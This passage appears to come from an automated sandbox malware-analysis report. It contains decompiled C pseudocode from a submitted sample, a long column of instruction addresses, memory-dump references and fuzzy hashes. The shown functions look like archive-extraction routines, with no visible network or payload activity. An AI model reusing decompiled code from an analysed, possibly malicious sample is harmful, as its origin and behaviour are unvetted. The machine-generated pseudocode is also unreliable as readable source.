									_t335 =  *(_t469 - 0x28);
									__eflags = _t335 - _t441;
									if(_t335 != _t441) {
										 *((intOrPtr*)( *_t335 + 0xc))(_t335,  *((intOrPtr*)(_t469 - 0x12c)));
										_t335 =  *(_t469 - 0x28);
									}
									__eflags = _t335 - _t441;
									 *(_t469 - 4) = 5;
									if(_t335 != _t441) {
										 *((intOrPtr*)( *_t335 + 8))(_t335);
									}
								}
								 *(_t469 - 0x104) = _t461;
								 *(_t469 - 0x34) = _t441;
								 *(_t469 - 0x30) = _t441;
								 *(_t469 - 0x2c) = _t441;
								 *(_t469 - 4) = 7;
								E004028C3(_t469 - 0x9c);
								 *((intOrPtr*)(_t469 - 0x9c)) =  *_t356;
								_t381 = 8;
								 *(_t469 - 4) = 8;
								_t288 = memcpy(_t469 - 0x94, _t356 + 8, _t381 << 2);
								_t472 = _t472 + 0xc;
								 *(_t469 - 0x80) = _t288;
								 *(_t469 - 0x5c) =  *(_t469 - 0x5c) & 0x00000000;
								 *((intOrPtr*)(_t469 - 0x70)) = _t469 - 0x34;
								 *(_t469 - 0x6c) =  *(_t469 - 0x18);
								E004037D2(_t469 - 0x58, _t469 - 0x12c);
								 *((intOrPtr*)(_t469 - 0x64)) =  *((intOrPtr*)(_t356 + 0x38));
								 *((intOrPtr*)(_t469 - 0x60)) =  *((intOrPtr*)(_t356 + 0x3c));
								_push(_t469 - 0x9c);
								_t460 = E0040A2C8(_t469 - 0x19c);
								_t297 =  *(_t356 + 0x28);
								_t298 = _t297[1];
								_t297[1] = _t460 - 1;
								 *(_t469 - 0x20) = 0 | _t297[1] != 0x00000000;
								if(_t460 == 1) {
									E0040A26D( *(_t469 - 0x1c) + 0x30, _t469 - 0x18c);
									E00403204(E00403204(E004037D2( *(_t469 - 0x1c) + 0x24, _t469 - 0x12c),  *((intOrPtr*)(_t469 - 0x58))),  *(_t469 - 0x34));
									 *(_t469 - 4) = 4;
									_t362 = _t469 - 0x19c;
									E00402F6E(_t362);
									_t306 =  *(_t469 - 0x18);
									 *(_t469 - 4) = 3;
									__eflags = _t306;
									if(_t306 != 0) {
										_t362 =  *_t306;
										 *((intOrPtr*)(_t362 + 8))(_t306);
									}
									_t307 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									__eflags = _t307;
									if(_t307 != 0) {
										_t362 =  *_t307;
										 *((intOrPtr*)(_t362 + 8))(_t307);
									}
									_t308 =  *(_t469 - 0x10);
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									__eflags = _t308;
									if(_t308 != 0) {
										_t362 =  *_t308;
										 *((intOrPtr*)(_t362 + 8))(_t308);
									}
									L63:
									_t441 = 0;
									__eflags = 0;
									goto L64;
								} else {
									__eflags = _t460;
									if(_t460 != 0) {
										L66:
										E00403204(E00403204(_t298,  *((intOrPtr*)(_t469 - 0x58))),  *(_t469 - 0x34));
										 *(_t469 - 4) = 4;
										E00402F6E(_t469 - 0x19c);
										_t315 =  *(_t469 - 0x18);
										 *(_t469 - 4) = 3;
										__eflags = _t315;
										if(_t315 != 0) {
											 *((intOrPtr*)( *_t315 + 8))(_t315);
										}
										_t316 =  *(_t469 - 0x14);
										 *(_t469 - 4) = 2;
										__eflags = _t316;
										if(_t316 != 0) {
											 *((intOrPtr*)( *_t316 + 8))(_t316);
										}
										_t317 =  *(_t469 - 0x10);
										 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
										__eflags = _t317;
										if(_t317 != 0) {
											 *((intOrPtr*)( *_t317 + 8))(_t317);
										}
										goto L72;
									}
									_t460 = E00409863( *(_t469 - 0x4c),  *(_t469 - 0x24), _t469 - 0x100, _t469 - 0xf8);
									__eflags = _t460;
									if(_t460 != 0) {
										goto L66;
									}
									_push(_t469 - 0x19c);
									E00403204(E00403204(E0040B397( *(_t469 - 0x1c)),  *((intOrPtr*)(_t469 - 0x58))),  *(_t469 - 0x34));
									 *(_t469 - 4) = 4;
									E00402F6E(_t469 - 0x19c);
									_t328 =  *(_t469 - 0x18);
									 *(_t469 - 4) = 3;
									__eflags = _t328;
									if(_t328 != 0) {
										 *((intOrPtr*)( *_t328 + 8))(_t328);
									}
									_t329 =  *(_t469 - 0x14);
									 *(_t469 - 4) = 2;
									__eflags = _t329;
									if(_t329 != 0) {
										 *((intOrPtr*)( *_t329 + 8))(_t329);
									}
									_t330 =  *(_t469 - 0x10);
									 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
									__eflags = _t330;
									if(_t330 != 0) {
										 *((intOrPtr*)( *_t330 + 8))(_t330);
									}
									continue;
								}
							}
							E0040AF06(_t469 - 0x27c);
							 *(_t469 - 4) = 0;
							E004037D2(_t469 - 0x200, _t356 + 0x44);
							E004037D2(_t469 - 0x20c, _t356 + 0x44);
							 *(_t469 - 0x1e4) =  *(_t469 - 0x1e4) | 0xffffffff;
							_t341 = E0040A53F(_t469 - 0x27c, _t356); // executed
							_t460 = _t341;
							__eflags = _t460;
							if(_t460 != 0) {
								__eflags = _t460 - 1;
								if(_t460 == 1) {
									E0040A26D( *(_t469 - 0x1c) + 0x30, _t469 - 0x23c);
									E004037D2( *(_t469 - 0x1c) + 0x24, _t469 - 0x20c);
								}
								 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
								E00402F6E(_t469 - 0x27c);
								goto L72;
							} else {
								_push(_t469 - 0x27c);
								E0040B397( *(_t469 - 0x1c));
								 *(_t469 - 4) =  *(_t469 - 4) | 0xffffffff;
								E00402F6E(_t469 - 0x27c);
								 *(_t469 - 0x20) =  *(_t469 - 0x20) & 0x00000000;
								_t241 = E004028F5(_t469 - 0x29c);
								_t360 = 8;
								_t244 = memcpy(_t356 + 8, _t241, _t360 << 2);
								_t472 = _t472 + 0xc;
								__eflags =  *_t244 - 1;
								if( *_t244 < 1) {
									goto L7;
								}
								goto L3;
							}
						}
						L7:
						_t362 =  *(_t469 - 0x1c);
						__eflags =  *((intOrPtr*)(_t362 + 4)) - 0x20;
						if( *((intOrPtr*)(_t362 + 4)) >= 0x20) {
							goto L63;
						}
						goto L8;
					}
				} else {
					_t246 = 0x80004001;
					L65:
					 *[fs:0x0] =  *((intOrPtr*)(_t469 - 0xc));
					return _t246;
				}
			}



























































                                                                                                                            0x0040a90f
                                                                                                                            0x0040a914
                                                                                                                            0x0040a91d
                                                                                                                            0x0040a920
                                                                                                                            0x0040a925
                                                                                                                            0x0040a931
                                                                                                                            0x0040a93d
                                                                                                                            0x0040a93d
                                                                                                                            0x0040a94a
                                                                                                                            0x0040a959
                                                                                                                            0x0040a95a
                                                                                                                            0x0040a95a
                                                                                                                            0x0040a95c
                                                                                                                            0x0040a95f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a961
                                                                                                                            0x0040a967
                                                                                                                            0x0040a96f
                                                                                                                            0x0040a972
                                                                                                                            0x0040a975
                                                                                                                            0x0040a97b
                                                                                                                            0x0040a97d
                                                                                                                            0x0040a9a0
                                                                                                                            0x0040a9a1
                                                                                                                            0x0040a9a1
                                                                                                                            0x0040a9a1
                                                                                                                            0x0040a9a3
                                                                                                                            0x0040a9aa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a97f
                                                                                                                            0x0040a98f
                                                                                                                            0x0040a990
                                                                                                                            0x0040a990
                                                                                                                            0x0040a9b0
                                                                                                                            0x0040a9b8
                                                                                                                            0x0040a9bc
                                                                                                                            0x0040a9bc
                                                                                                                            0x0040a9cd
                                                                                                                            0x0040a9cd
                                                                                                                            0x0040a9d0
                                                                                                                            0x0040a9d2
                                                                                                                            0x0040a9d5
                                                                                                                            0x0040a9d7
                                                                                                                            0x0040aa44
                                                                                                                            0x0040aa46
                                                                                                                            0x0040aa4a
                                                                                                                            0x0040aa4d
                                                                                                                            0x0040aa4f
                                                                                                                            0x0040aa4f
                                                                                                                            0x0040aa56
                                                                                                                            0x0040aa5a
                                                                                                                            0x0040aa5e
                                                                                                                            0x0040aa61
                                                                                                                            0x0040aa6c
                                                                                                                            0x0040aa73
                                                                                                                            0x0040aa76
                                                                                                                            0x0040aa78
                                                                                                                            0x0040ad22
                                                                                                                            0x0040ad25
                                                                                                                            0x0040ad27
                                                                                                                            0x0040aeb0
                                                                                                                            0x0040aeb0
                                                                                                                            0x00000000
                                                                                                                            0x0040aeb0
                                                                                                                            0x0040aa7e
                                                                                                                            0x0040aa83
                                                                                                                            0x0040aef9
                                                                                                                            0x0040aefc
                                                                                                                            0x0040aefc
                                                                                                                            0x0040ae3c
                                                                                                                            0x0040ae3c
                                                                                                                            0x0040ae3f
                                                                                                                            0x0040ae42
                                                                                                                            0x0040ae42
                                                                                                                            0x0040ae45
                                                                                                                            0x0040ae48
                                                                                                                            0x00000000
                                                                                                                            0x0040ae48
                                                                                                                            0x0040aa8f
                                                                                                                            0x0040aa92
                                                                                                                            0x0040aa98
                                                                                                                            0x0040aa9b
                                                                                                                            0x0040aa9d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040aaa6
                                                                                                                            0x0040aaa9
                                                                                                                            0x0040aaac
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040aab2
                                                                                                                            0x0040aab7
                                                                                                                            0x0040aaba
                                                                                                                            0x0040aac5
                                                                                                                            0x0040aac8
                                                                                                                            0x0040aacf
                                                                                                                            0x0040aad1
                                                                                                                            0x0040aad3
                                                                                                                            0x0040aad6
                                                                                                                            0x0040aef3
                                                                                                                            0x0040aef3
                                                                                                                            0x0040aeda
                                                                                                                            0x0040aeda
                                                                                                                            0x0040aedc
                                                                                                                            0x0040aee2
                                                                                                                            0x0040aee5
                                                                                                                            0x0040aee5
                                                                                                                            0x00000000
                                                                                                                            0x0040aedc
                                                                                                                            0x0040aadc
                                                                                                                            0x0040aade
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040aae4
                                                                                                                            0x0040aae7
                                                                                                                            0x0040aaed
                                                                                                                            0x0040aaf5
                                                                                                                            0x0040aaf8
                                                                                                                            0x0040aafa
                                                                                                                            0x0040aafd
                                                                                                                            0x0040aeed
                                                                                                                            0x0040aeed
                                                                                                                            0x0040aec9
                                                                                                                            0x0040aec9
                                                                                                                            0x0040aecb
                                                                                                                            0x0040aecd
                                                                                                                            0x0040aed0
                                                                                                                            0x0040aed0
                                                                                                                            0x0040aed3
                                                                                                                            0x0040aed3
                                                                                                                            0x0040aed3
                                                                                                                            0x0040aed7
                                                                                                                            0x00000000
                                                                                                                            0x0040aed7
                                                                                                                            0x0040ab03
                                                                                                                            0x0040ab05
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ab0b
                                                                                                                            0x0040ab0e
                                                                                                                            0x0040ab1a
                                                                                                                            0x0040ab1e
                                                                                                                            0x0040ab20
                                                                                                                            0x0040ab22
                                                                                                                            0x0040ab25
                                                                                                                            0x0040aeb4
                                                                                                                            0x0040aeb4
                                                                                                                            0x0040aeb6
                                                                                                                            0x0040aeba
                                                                                                                            0x0040aebc
                                                                                                                            0x0040aebf
                                                                                                                            0x0040aebf
                                                                                                                            0x0040aec2
                                                                                                                            0x0040aec5
                                                                                                                            0x00000000
                                                                                                                            0x0040aec5
                                                                                                                            0x0040ab2b
                                                                                                                            0x0040ab2d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ab39
                                                                                                                            0x0040ab47
                                                                                                                            0x0040ab4e
                                                                                                                            0x0040ab53
                                                                                                                            0x0040ab55
                                                                                                                            0x0040ab58
                                                                                                                            0x0040ad37
                                                                                                                            0x0040ad3b
                                                                                                                            0x0040ad40
                                                                                                                            0x0040ad43
                                                                                                                            0x0040ad47
                                                                                                                            0x0040ad49
                                                                                                                            0x0040ad4e
                                                                                                                            0x0040ad4e
                                                                                                                            0x0040ad51
                                                                                                                            0x0040ad54
                                                                                                                            0x0040ad58
                                                                                                                            0x0040ad5a
                                                                                                                            0x0040ad5f
                                                                                                                            0x0040ad5f
                                                                                                                            0x0040ad62
                                                                                                                            0x0040ad65
                                                                                                                            0x0040ad69
                                                                                                                            0x0040ad6b
                                                                                                                            0x0040ad70
                                                                                                                            0x0040ad70
                                                                                                                            0x0040ad73
                                                                                                                            0x00000000
                                                                                                                            0x0040ad73
                                                                                                                            0x0040ab60
                                                                                                                            0x0040ab6b
                                                                                                                            0x0040ab70
                                                                                                                            0x0040ab72
                                                                                                                            0x0040ab75
                                                                                                                            0x0040ad81
                                                                                                                            0x0040ad85
                                                                                                                            0x0040ad8a
                                                                                                                            0x0040ad8d
                                                                                                                            0x0040ad91
                                                                                                                            0x0040ad93
                                                                                                                            0x0040ad98
                                                                                                                            0x0040ad98
                                                                                                                            0x0040ad9b
                                                                                                                            0x0040ad9e
                                                                                                                            0x0040ada2
                                                                                                                            0x0040ada4
                                                                                                                            0x0040ada9
                                                                                                                            0x0040ada9
                                                                                                                            0x0040adac
                                                                                                                            0x0040adaf
                                                                                                                            0x0040adb3
                                                                                                                            0x0040adb5
                                                                                                                            0x0040adba
                                                                                                                            0x0040adba
                                                                                                                            0x0040adbd
                                                                                                                            0x00000000
                                                                                                                            0x0040adbd
                                                                                                                            0x0040ab7b
                                                                                                                            0x0040ab7e
                                                                                                                            0x0040ab80
                                                                                                                            0x0040ab82
                                                                                                                            0x0040ab91
                                                                                                                            0x0040ab95
                                                                                                                            0x0040ab97
                                                                                                                            0x0040ab9a
                                                                                                                            0x0040ab9c
                                                                                                                            0x0040aba7
                                                                                                                            0x0040abaa
                                                                                                                            0x0040abaa
                                                                                                                            0x0040abad
                                                                                                                            0x0040abaf
                                                                                                                            0x0040abb3
                                                                                                                            0x0040abb8
                                                                                                                            0x0040abb8
                                                                                                                            0x0040abb3
                                                                                                                            0x0040abbb
                                                                                                                            0x0040abc1
                                                                                                                            0x0040abc4
                                                                                                                            0x0040abc7
                                                                                                                            0x0040abd0
                                                                                                                            0x0040abd4
                                                                                                                            0x0040abdd
                                                                                                                            0x0040abe6
                                                                                                                            0x0040abf0
                                                                                                                            0x0040abf4
                                                                                                                            0x0040abf4
                                                                                                                            0x0040abf6
                                                                                                                            0x0040abfc
                                                                                                                            0x0040ac00
                                                                                                                            0x0040ac09
                                                                                                                            0x0040ac13
                                                                                                                            0x0040ac21
                                                                                                                            0x0040ac27
                                                                                                                            0x0040ac30
                                                                                                                            0x0040ac36
                                                                                                                            0x0040ac38
                                                                                                                            0x0040ac3d
                                                                                                                            0x0040ac45
                                                                                                                            0x0040ac48
                                                                                                                            0x0040ac4b
                                                                                                                            0x0040add2
                                                                                                                            0x0040adf1
                                                                                                                            0x0040adf7
                                                                                                                            0x0040adfc
                                                                                                                            0x0040ae02
                                                                                                                            0x0040ae07
                                                                                                                            0x0040ae0a
                                                                                                                            0x0040ae0e
                                                                                                                            0x0040ae10
                                                                                                                            0x0040ae12
                                                                                                                            0x0040ae15
                                                                                                                            0x0040ae15
                                                                                                                            0x0040ae18
                                                                                                                            0x0040ae1b
                                                                                                                            0x0040ae1f
                                                                                                                            0x0040ae21
                                                                                                                            0x0040ae23
                                                                                                                            0x0040ae26
                                                                                                                            0x0040ae26
                                                                                                                            0x0040ae29
                                                                                                                            0x0040ae2c
                                                                                                                            0x0040ae30
                                                                                                                            0x0040ae32
                                                                                                                            0x0040ae34
                                                                                                                            0x0040ae37
                                                                                                                            0x0040ae37
                                                                                                                            0x0040ae3a
                                                                                                                            0x0040ae3a
                                                                                                                            0x0040ae3a
                                                                                                                            0x00000000
                                                                                                                            0x0040ac51
                                                                                                                            0x0040ac51
                                                                                                                            0x0040ac53
                                                                                                                            0x0040ae5c
                                                                                                                            0x0040ae67
                                                                                                                            0x0040ae6d
                                                                                                                            0x0040ae78
                                                                                                                            0x0040ae7d
                                                                                                                            0x0040ae80
                                                                                                                            0x0040ae84
                                                                                                                            0x0040ae86
                                                                                                                            0x0040ae8b
                                                                                                                            0x0040ae8b
                                                                                                                            0x0040ae8e
                                                                                                                            0x0040ae91
                                                                                                                            0x0040ae95
                                                                                                                            0x0040ae97
                                                                                                                            0x0040ae9c
                                                                                                                            0x0040ae9c
                                                                                                                            0x0040ae9f
                                                                                                                            0x0040aea2
                                                                                                                            0x0040aea6
                                                                                                                            0x0040aea8
                                                                                                                            0x0040aead
                                                                                                                            0x0040aead
                                                                                                                            0x00000000
                                                                                                                            0x0040aea8
                                                                                                                            0x0040ac72
                                                                                                                            0x0040ac74
                                                                                                                            0x0040ac76
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ac85
                                                                                                                            0x0040ac96
                                                                                                                            0x0040ac9c
                                                                                                                            0x0040aca7
                                                                                                                            0x0040acac
                                                                                                                            0x0040acaf
                                                                                                                            0x0040acb3
                                                                                                                            0x0040acb5
                                                                                                                            0x0040acba
                                                                                                                            0x0040acba
                                                                                                                            0x0040acbd
                                                                                                                            0x0040acc0
                                                                                                                            0x0040acc4
                                                                                                                            0x0040acc6
                                                                                                                            0x0040accb
                                                                                                                            0x0040accb
                                                                                                                            0x0040acce
                                                                                                                            0x0040acd1
                                                                                                                            0x0040acd5
                                                                                                                            0x0040acd7
                                                                                                                            0x0040ace0
                                                                                                                            0x0040ace0
                                                                                                                            0x00000000
                                                                                                                            0x0040acd7
                                                                                                                            0x0040ac4b
                                                                                                                            0x0040a9df
                                                                                                                            0x0040a9ee
                                                                                                                            0x0040a9f1
                                                                                                                            0x0040a9fd
                                                                                                                            0x0040aa02
                                                                                                                            0x0040aa10
                                                                                                                            0x0040aa15
                                                                                                                            0x0040aa17
                                                                                                                            0x0040aa19
                                                                                                                            0x0040ace8
                                                                                                                            0x0040aceb
                                                                                                                            0x0040acfa
                                                                                                                            0x0040ad09
                                                                                                                            0x0040ad09
                                                                                                                            0x0040ad0e
                                                                                                                            0x0040ad18
                                                                                                                            0x00000000
                                                                                                                            0x0040aa1f
                                                                                                                            0x0040aa28
                                                                                                                            0x0040aa29
                                                                                                                            0x0040aa2e
                                                                                                                            0x0040aa38
                                                                                                                            0x0040a93d
                                                                                                                            0x0040a94a
                                                                                                                            0x0040a959
                                                                                                                            0x0040a95a
                                                                                                                            0x0040a95a
                                                                                                                            0x0040a95c
                                                                                                                            0x0040a95f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a95f
                                                                                                                            0x0040aa19
                                                                                                                            0x0040a9c0
                                                                                                                            0x0040a9c0
                                                                                                                            0x0040a9c3
                                                                                                                            0x0040a9c7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a9c7
                                                                                                                            0x0040a933
                                                                                                                            0x0040a933
                                                                                                                            0x0040ae4b
                                                                                                                            0x0040ae51
                                                                                                                            0x0040ae59
                                                                                                                            0x0040ae59

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: 03cf4591cf909b2d04c6413f81e879f8fbbf87ed20dd82c53fd02e17f46b7009
                                                                                                                            • Instruction ID: 25566729ef2c52a6845be5edffbec3a608f7ce3cf95c208b8dc0a298da87cac0
                                                                                                                            • Opcode Fuzzy Hash: 03cf4591cf909b2d04c6413f81e879f8fbbf87ed20dd82c53fd02e17f46b7009
                                                                                                                            • Instruction Fuzzy Hash: 24128E71900209DFCF10DFA4C888ADEBBB5AF48314F2485AAE459BB2D1D738AE45CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401F26 Relevance: 1.8, APIs: 1, Instructions: 347COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E00401F26() {
				void* __ebx;
				signed int _t153;
				intOrPtr* _t155;
				signed int _t156;
				signed int _t163;
				intOrPtr* _t164;
				signed int _t165;
				signed int _t166;
				intOrPtr* _t167;
				intOrPtr* _t171;
				signed int _t172;
				intOrPtr* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t185;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				void* _t197;
				signed int _t207;
				void* _t209;
				signed int _t230;
				WCHAR* _t270;
				signed int _t289;
				signed int* _t291;
				signed int _t292;
				signed int _t294;
				intOrPtr* _t296;
				signed int _t297;
				void* _t298;

				E00418D80(E00419577, _t298);
				_t294 =  *(_t298 + 8);
				if(E004023F0(_t294 + 0xa8) == 0) {
					_t153 =  *(_t294 + 0x4c);
					__eflags = _t153;
					if(_t153 != 0) {
						 *((intOrPtr*)( *_t153 + 8))(_t153);
						 *(_t294 + 0x4c) = 0;
					}
					E0040368D(_t298 - 0x28);
					 *((intOrPtr*)(_t298 - 4)) = 0;
					 *(_t298 - 0x1c) = 0;
					 *((short*)(_t298 - 0x1a)) = 0;
					 *(_t298 - 0x14) = 0;
					_t155 =  *((intOrPtr*)(_t294 + 0xc));
					_t289 =  *(_t298 + 0xc);
					 *((char*)(_t298 - 4)) = 1;
					_t156 =  *((intOrPtr*)( *_t155 + 0x18))(_t155, _t289, 3, _t298 - 0x1c);
					__eflags = _t156;
					if(_t156 == 0) {
						__eflags =  *(_t298 - 0x1c);
						if( *(_t298 - 0x1c) != 0) {
							__eflags =  *(_t298 - 0x1c) - 8;
							if( *(_t298 - 0x1c) == 8) {
								E0040387D(_t156, _t298 - 0x28,  *(_t298 - 0x14));
								L12:
								E004037D2(_t294 + 0x1c, _t298 - 0x28);
								 *((char*)(_t298 - 4)) = 0;
								E00405DEF(_t298 - 0x1c);
								__eflags =  *(_t298 + 0x14);
								if( *(_t298 + 0x14) != 0) {
									_t161 =  *(_t298 + 0x10);
									 *( *(_t298 + 0x10)) = 0;
									L60:
									E00403204(_t161,  *((intOrPtr*)(_t298 - 0x28)));
									_t163 = 0;
									__eflags = 0;
									goto L61;
								}
								 *(_t298 - 0x1c) = 0;
								 *((short*)(_t298 - 0x1a)) = 0;
								 *(_t298 - 0x14) = 0;
								_t164 =  *((intOrPtr*)(_t294 + 0xc));
								 *((char*)(_t298 - 4)) = 2;
								_t165 =  *((intOrPtr*)( *_t164 + 0x18))(_t164, _t289, 9, _t298 - 0x1c);
								__eflags = _t165;
								if(_t165 == 0) {
									__eflags =  *(_t298 - 0x1c);
									if( *(_t298 - 0x1c) != 0) {
										__eflags =  *(_t298 - 0x1c) - 0x13;
										if( *(_t298 - 0x1c) == 0x13) {
											_t166 =  *(_t298 - 0x14);
											L20:
											 *(_t294 + 0x44) = _t166;
											_t167 =  *((intOrPtr*)(_t294 + 0xc));
											_t165 =  *((intOrPtr*)( *_t167 + 0x18))(_t167, _t289, 6, _t298 - 0x1c);
											__eflags = _t165;
											if(_t165 != 0) {
												goto L14;
											}
											__eflags =  *(_t298 - 0x14);
											 *(_t298 + 0xb) = 0;
											 *((short*)(_t298 - 0x50)) = 0;
											 *((short*)(_t298 - 0x4e)) = 0;
											 *(_t294 + 0x40) = _t165 & 0xffffff00 |  *(_t298 - 0x14) != 0x00000000;
											 *(_t298 - 0x48) = 0;
											_t171 =  *((intOrPtr*)(_t294 + 0xc));
											 *((char*)(_t298 - 4)) = 3;
											_t172 =  *((intOrPtr*)( *_t171 + 0x18))(_t171, _t289, 0x15, _t298 - 0x50);
											__eflags = _t172;
											 *(_t298 + 0xc) = _t172;
											if(_t172 == 0) {
												__eflags =  *((short*)(_t298 - 0x50)) - 0xb;
												if( *((short*)(_t298 - 0x50)) == 0xb) {
													__eflags =  *(_t298 - 0x48);
													_t63 = _t298 + 0xb;
													 *_t63 =  *(_t298 - 0x48) != 0;
													__eflags =  *_t63;
												}
												 *((char*)(_t298 - 4)) = 2;
												E00405DEF(_t298 - 0x50);
												_t174 =  *((intOrPtr*)(_t294 + 0xc));
												_t165 =  *((intOrPtr*)( *_t174 + 0x18))(_t174, _t289, 0xc, _t298 - 0x1c);
												__eflags = _t165;
												if(_t165 != 0) {
													goto L14;
												} else {
													_t175 =  *(_t298 - 0x1c) & 0x0000ffff;
													__eflags = _t175;
													if(__eflags == 0) {
														_t291 = _t294 + 0x38;
														 *_t291 =  *(_t294 + 0x5c);
														_t177 =  *(_t294 + 0x60);
														L30:
														_t291[1] = _t177;
														 *((intOrPtr*)(_t298 - 0x34)) = 0;
														 *(_t298 - 0x30) = 0;
														 *((intOrPtr*)(_t298 - 0x2c)) = 0;
														 *((char*)(_t298 - 4)) = 4;
														E004041F8(_t298 - 0x28, _t298 - 0x34, __eflags);
														__eflags =  *(_t298 - 0x30);
														if(__eflags != 0) {
															E00403740(_t298 - 0x5c, __eflags, _t298 - 0x28);
															__eflags =  *(_t294 + 0x40);
															 *((char*)(_t298 - 4)) = 5;
															if( *(_t294 + 0x40) == 0) {
																E004024B5(_t298 - 0x34);
															}
															__eflags =  *(_t298 - 0x30);
															if( *(_t298 - 0x30) != 0) {
																__eflags =  *(_t298 + 0xb);
																if(__eflags == 0) {
																	_push(_t298 - 0x34);
																	E00401E92(_t294, __eflags);
																}
															}
															E00403632(_t298 - 0x40, _t294 + 0x10, _t298 - 0x5c);
															__eflags =  *(_t294 + 0x40);
															 *((char*)(_t298 - 4)) = 6;
															if( *(_t294 + 0x40) == 0) {
																E00404D7D(_t298 - 0x94);
																E0040368D(_t298 - 0x6c);
																 *((char*)(_t298 - 4)) = 7;
																_t185 = E00404DAF(_t298 - 0x94, __eflags,  *((intOrPtr*)(_t298 - 0x40))); // executed
																__eflags = _t185;
																if(__eflags == 0) {
																	L47:
																	__eflags =  *(_t298 + 0xb);
																	if( *(_t298 + 0xb) != 0) {
																		L58:
																		E00403204(E00403204(E00403204(E004037D2(_t294 + 0x28, _t298 - 0x40),  *((intOrPtr*)(_t298 - 0x6c))),  *((intOrPtr*)(_t298 - 0x40))),  *((intOrPtr*)(_t298 - 0x5c)));
																		 *((char*)(_t298 - 4)) = 2;
																		E00410DA8(0, _t298 - 0x34);
																		_t161 = E00405DEF(_t298 - 0x1c);
																		goto L60;
																	}
																	_push(0x18);
																	_t192 = E004031DD();
																	__eflags = _t192;
																	if(_t192 == 0) {
																		_t292 = 0;
																		__eflags = 0;
																	} else {
																		 *((intOrPtr*)(_t192 + 4)) = 0;
																		 *(_t192 + 8) =  *(_t192 + 8) | 0xffffffff;
																		 *_t192 = 0x41b600;
																		_t292 = _t192;
																	}
																	__eflags = _t292;
																	 *(_t294 + 0x48) = _t292;
																	 *(_t298 + 8) = _t292;
																	if(_t292 != 0) {
																		 *((intOrPtr*)( *_t292 + 4))(_t292);
																	}
																	_t193 =  *(_t294 + 0x48);
																	 *((intOrPtr*)(_t193 + 0x10)) = 0;
																	 *((char*)(_t298 - 4)) = 8;
																	 *((intOrPtr*)(_t193 + 0x14)) = 0;
																	_t194 = E00405489( *((intOrPtr*)(_t298 - 0x40)), 1);
																	__eflags = _t194;
																	if(_t194 != 0) {
																		E004063E5(_t294 + 0x4c, _t292);
																		 *((char*)(_t298 - 4)) = 7;
																		 *( *(_t298 + 0x10)) = _t292;
																		goto L58;
																	} else {
																		_t197 = E004038D0(_t294 + 0xe4,  *0x41b5ac);
																		__eflags = _t292;
																		 *((char*)(_t298 - 4)) = 7;
																		if(_t292 != 0) {
																			_t197 =  *((intOrPtr*)( *_t292 + 8))(_t292);
																		}
																		E00403204(E00403204(E00403204(_t197,  *((intOrPtr*)(_t298 - 0x6c))),  *((intOrPtr*)(_t298 - 0x40))),  *((intOrPtr*)(_t298 - 0x5c)));
																		 *((char*)(_t298 - 4)) = 2;
																		E00410DA8(0, _t298 - 0x34);
																		E00403204(E00405DEF(_t298 - 0x1c),  *((intOrPtr*)(_t298 - 0x28)));
																		_t163 = 0x80004005;
																		goto L61;
																	}
																}
																_t207 = E00404643( *((intOrPtr*)(_t298 - 0x40)), __eflags);
																__eflags = _t207;
																if(_t207 != 0) {
																	goto L47;
																}
																_t209 = E00403204(E004038D0(_t294 + 0xe4,  *0x41b5a8),  *((intOrPtr*)(_t298 - 0x6c)));
																_t230 = 0x80004005;
																goto L44;
															} else {
																_t296 = _t294 + 0x28;
																E004037D2(_t296, _t298 - 0x40);
																__eflags =  *(_t298 + 0xb);
																_t270 =  *_t296;
																if( *(_t298 + 0xb) == 0) {
																	_t209 = E00404419(_t270, 0, 0, _t291);
																} else {
																	_t209 = E00404470(_t270);
																}
																L44:
																E00403204(E00403204(_t209,  *((intOrPtr*)(_t298 - 0x40))),  *((intOrPtr*)(_t298 - 0x5c)));
																L45:
																 *((char*)(_t298 - 4)) = 2;
																E00410DA8(_t230, _t298 - 0x34);
																L46:
																E00403204(E00405DEF(_t298 - 0x1c),  *((intOrPtr*)(_t298 - 0x28)));
																_t163 = _t230;
																goto L61;
															}
														}
														_t230 = 0x80004005;
														goto L45;
													}
													__eflags = _t175 - 0x40;
													if(__eflags != 0) {
														goto L18;
													}
													_t291 = _t294 + 0x38;
													 *_t291 =  *(_t298 - 0x14);
